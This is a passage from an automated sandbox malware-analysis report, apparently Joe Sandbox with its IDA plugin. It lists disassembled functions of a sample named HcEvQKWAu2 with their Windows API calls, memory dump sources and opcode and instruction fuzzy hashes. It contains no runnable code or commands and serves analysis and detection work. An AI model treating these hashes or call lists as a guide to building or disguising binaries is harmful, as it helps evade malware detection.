                                          • Instruction ID: 1ed413f499f53ac5bf023e66b0559332bfb6be883adfa5cbca31ffcdf55116bf
                                          • Opcode Fuzzy Hash: 5523375e87895ea5ebeba2980c5d2e14e179aee81bb96fd63f195be97fd00c45
                                          • Instruction Fuzzy Hash: 67E01277904118AADF11A7949C45FDA77ACEF093D1F0400657645D2104DA74DA84DBA0
                                          Function 00F9A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F9A3DA
                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F9A3E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: BitmapCreateFromGdipStream
                                          • String ID:
                                          • API String ID: 1918208029-0
                                          • Opcode ID: 4260de06a209a7e4946d2f227040ad396b0404bc3e2b9c452caea9a08e7df4c6
                                          • Instruction ID: f2cf1918bf32c87608612055ba02df69e2b20025dd370d38a4c92387774c17ef
                                          • Opcode Fuzzy Hash: 4260de06a209a7e4946d2f227040ad396b0404bc3e2b9c452caea9a08e7df4c6
                                          • Instruction Fuzzy Hash: FCE0ED71900218EBDB10DF55C941B99BBE8EB04364F20C05AA84693201E774AE04EB91
                                          Function 00FA2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FA2BAA
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FA2BB5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                          • String ID:
                                          • API String ID: 1660781231-0
                                          • Opcode ID: 6cc2bcabad74666c351e47b49a2296d7f828b78ab196196e783237b8cb1a3529
                                          • Instruction ID: 2b984a431bd5913e682aa754e96b8e0e35d88e09890a122d6485d4af9e3aa7ca
                                          • Opcode Fuzzy Hash: 6cc2bcabad74666c351e47b49a2296d7f828b78ab196196e783237b8cb1a3529
                                          • Instruction Fuzzy Hash: E9D0A9F5BA42085A8CD42A7C6D026883389BDC3BF07A0438AF421958C1EE188040B032
                                          Function 00F812F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ItemShowWindow
                                          • String ID:
                                          • API String ID: 3351165006-0
                                          • Opcode ID: bfc2c3f33da1455e041095beb79c097ccc4945e36f8cc4ffc3834fab118f456c
                                          • Instruction ID: 4a97d0429cd54872324f516f49f8431343f429c240fa57d5e27455fda764fc34
                                          • Opcode Fuzzy Hash: bfc2c3f33da1455e041095beb79c097ccc4945e36f8cc4ffc3834fab118f456c
                                          • Instruction Fuzzy Hash: 1DC0123285C2A8BECB010BB4DC0DC2BBBA8ABA5312F04C90CB0A5C2060C23CC110EB11
                                          Function 00F81A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 3d754e23d664aaf2723a4def28835f11b6ac9af5842667d5579d4c7245467630
                                          • Instruction ID: 48b711e8330064743474e3c95521b6191f34c91f39899748c58971dce84c6538
                                          • Opcode Fuzzy Hash: 3d754e23d664aaf2723a4def28835f11b6ac9af5842667d5579d4c7245467630
                                          • Instruction Fuzzy Hash: 0FC1B571E002549FEF15EF68C884BE97BA9BF45320F0802B9DC45DB392DB349946EB61
                                          Function 00F83BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 59f6713665d96f2ab575fdc8248897bb436beab11466f3295566b2d4619ed509
                                          • Instruction ID: 52d7db374926c5ead54513c6874ee3cadedcde3b6fa37548ccd541e0467409aa
                                          • Opcode Fuzzy Hash: 59f6713665d96f2ab575fdc8248897bb436beab11466f3295566b2d4619ed509
                                          • Instruction Fuzzy Hash: 4F710472500B449EDB35EB70CC55AE7B7E9AF15700F40092EE2AB87252DA367688EF11
                                          Function 00F88284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F88289
                                            • Part of subcall function 00F813DC: __EH_prolog.LIBCMT ref: 00F813E1
                                            • Part of subcall function 00F8A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00F8A598
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog$CloseFind
                                          • String ID:
                                          • API String ID: 2506663941-0
                                          • Opcode ID: ad57e17a464ef055ace2a28a1ac729071e9aa8f3617abad29e8671cfb5f62b2c
                                          • Instruction ID: fe9023dcb5cb03a311cd651d7d9c85577d72fc052d57433aa29b6dccbd46c826
                                          • Opcode Fuzzy Hash: ad57e17a464ef055ace2a28a1ac729071e9aa8f3617abad29e8671cfb5f62b2c
                                          • Instruction Fuzzy Hash: A741B671D446589ADB20FB60CC55BEAB7B8BF00344F4404EBE18A97093EB755EC6EB10
                                          Function 00F813E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F813E1
                                            • Part of subcall function 00F85E37: __EH_prolog.LIBCMT ref: 00F85E3C
                                            • Part of subcall function 00F8CE40: __EH_prolog.LIBCMT ref: 00F8CE45
                                            • Part of subcall function 00F8B505: __EH_prolog.LIBCMT ref: 00F8B50A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 7ed7a908dbe25aaf1c17ee0341436ab43fd90bb87b19fdd51d26dc0b1b303e26
                                          • Instruction ID: eed0e3b1421ca911781980bc687cc5783bc07fde92d1f435d65847cb00ca8a4c
                                          • Opcode Fuzzy Hash: 7ed7a908dbe25aaf1c17ee0341436ab43fd90bb87b19fdd51d26dc0b1b303e26
                                          • Instruction Fuzzy Hash: AA418BB0905B40DEE724DF398885AE6FBE5BF19310F544A2ED5FE83282CB352654DB10
                                          Function 00F813DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F813E1
                                            • Part of subcall function 00F85E37: __EH_prolog.LIBCMT ref: 00F85E3C
                                            • Part of subcall function 00F8CE40: __EH_prolog.LIBCMT ref: 00F8CE45
                                            • Part of subcall function 00F8B505: __EH_prolog.LIBCMT ref: 00F8B50A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 294b460944665d43c2a5133ba3cb67a2f5dbf334e3b3112fac783f86ff5f4e94
                                          • Instruction ID: e1b8ba4257771784303a8f4ca818bc76de53da2500c4baff8789e8d3d2ca20f2
                                          • Opcode Fuzzy Hash: 294b460944665d43c2a5133ba3cb67a2f5dbf334e3b3112fac783f86ff5f4e94
                                          • Instruction Fuzzy Hash: 3E4168B0905B409EE724DF398885AE6FBE5BF19310F544A2ED5FE83282CB352654DB10
                                          Function 00F9B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F9B098
                                            • Part of subcall function 00F813DC: __EH_prolog.LIBCMT ref: 00F813E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 0f70f05be2985b7139e904d5ac8bcda57f418e4ddec8d1f62bdeb1d5e48e7fca
                                          • Instruction ID: 90d450f206b469779e228f4c5c1c3d13f1bacd012d027c2b1f29e70595b23570
                                          • Opcode Fuzzy Hash: 0f70f05be2985b7139e904d5ac8bcda57f418e4ddec8d1f62bdeb1d5e48e7fca
                                          • Instruction Fuzzy Hash: 9C319E71C00249DEDF15EFA4DD519EEB7B8AF09300F10449EE409B3242D739AE05EB61
                                          Function 00FAAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,00FB3A34), ref: 00FAACF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID:
                                          • API String ID: 190572456-0
                                          • Opcode ID: 9b9a6bba3b0f1181e75a486acafece00f60808bd4e0ca660c0d99a9d2fa7c24d
                                          • Instruction ID: 71f0fd71d756e5d1eb7badf91a9812624c161653bdb331e85fee13f73d320772
                                          • Opcode Fuzzy Hash: 9b9a6bba3b0f1181e75a486acafece00f60808bd4e0ca660c0d99a9d2fa7c24d
                                          • Instruction Fuzzy Hash: 8E110DB3B006295F9B229E18DC8099A73559B863707264210FC55AB254DB34DC05FBD1
                                          Function 00F89215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: a8524f8d8ac03babaab1cbf4a3a3f450408c730ca4de569047873d23863e0498
                                          • Instruction ID: 19e019cc67bf286e0798b8eaad74cf914b9e566549a59b7dc97970d0b0b1e579
                                          • Opcode Fuzzy Hash: a8524f8d8ac03babaab1cbf4a3a3f450408c730ca4de569047873d23863e0498
                                          • Instruction Fuzzy Hash: C3015233D00528ABCF12BFA8CC819EEB735BF88750B054615E816B7152DA78CD05E7A0
                                          Function 00FAC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00FAB136: RtlAllocateHeap.NTDLL(00000008,00FB3A34,00000000,?,00FA989A,00000001,00000364,?,?,?,00F8D984,?,?,?,00000004,00F8D710), ref: 00FAB177
                                          • _free.LIBCMT ref: 00FAC4E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                          • Instruction ID: e17c2e87771657edbe954952822be3c73a8f889622e1ec7581c84f38897aa872
                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                          • Instruction Fuzzy Hash: 4501D6B26043056BE331CE65DC85A6AFBE9EB8A370F25051DE59483281EA30A905C768
                                          Function 00FAB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,00FB3A34,00000000,?,00FA989A,00000001,00000364,?,?,?,00F8D984,?,?,?,00000004,00F8D710), ref: 00FAB177
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 65e555c2cf0a91415b376f04112277b3d43024925061c14c4e7deadff06073c0
                                          • Instruction ID: 6c51a8901508e5bd0dc0f4fe1003a42b2cee4525df200b4245ff714f16688a43
                                          • Opcode Fuzzy Hash: 65e555c2cf0a91415b376f04112277b3d43024925061c14c4e7deadff06073c0
                                          • Instruction Fuzzy Hash: 8AF089B294512577DB256B61AC25F5F7748FF43770B188221FC089B192DB74ED01B6E0
                                          Function 00FA3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00FA3C3F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID:
                                          • API String ID: 190572456-0
                                          • Opcode ID: d68ad3696b689482bba7154349412f52745bcd544537a9a252058645abdc9bb2
                                          • Instruction ID: d203bf285958d23c34258d3ab0c0d49add7dcaaa0bb8f45a5c9b9ab6ffbda850
                                          • Opcode Fuzzy Hash: d68ad3696b689482bba7154349412f52745bcd544537a9a252058645abdc9bb2
                                          • Instruction Fuzzy Hash: BAF0E57264021A9FCF119EA8FC04A9A77EDEF42B747104125FA05E71D0EB31EA20FB90
                                          Function 00FA8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: a999435dbe215295c91ae0f274d71efcc727d79e5b96ca2c61fc8dcc23ad3a4b
                                          • Instruction ID: d6feb9937de88e6ee1c77028fc57fda23a94079facaa1774053c0f201763f2fa
                                          • Opcode Fuzzy Hash: a999435dbe215295c91ae0f274d71efcc727d79e5b96ca2c61fc8dcc23ad3a4b
                                          • Instruction Fuzzy Hash: 73E0E5B1A06216D6DB7137A19C84B9B768CAF433F0F110121AC0997091DFE5CC02B5E0
                                          Function 00F85ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F85AC2
                                            • Part of subcall function 00F8B505: __EH_prolog.LIBCMT ref: 00F8B50A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 4672c63a25a86aa1e556f309c7c6458880660b8b5bf425e9a8f748364317a95e
                                          • Instruction ID: 0f904d8454ba481e739c04b7adf5882454b8cfbde339fe44be1b46b5fa105015
                                          • Opcode Fuzzy Hash: 4672c63a25a86aa1e556f309c7c6458880660b8b5bf425e9a8f748364317a95e
                                          • Instruction Fuzzy Hash: 95018C30810690DEEB25EBB8C8417DDFBA4DF64304F54848DA45653282DFB82B08E7A2
                                          Function 00F8A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F8A69B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6C4
                                            • Part of subcall function 00F8A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6F2
                                            • Part of subcall function 00F8A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6FE
                                          • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00F8A598
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
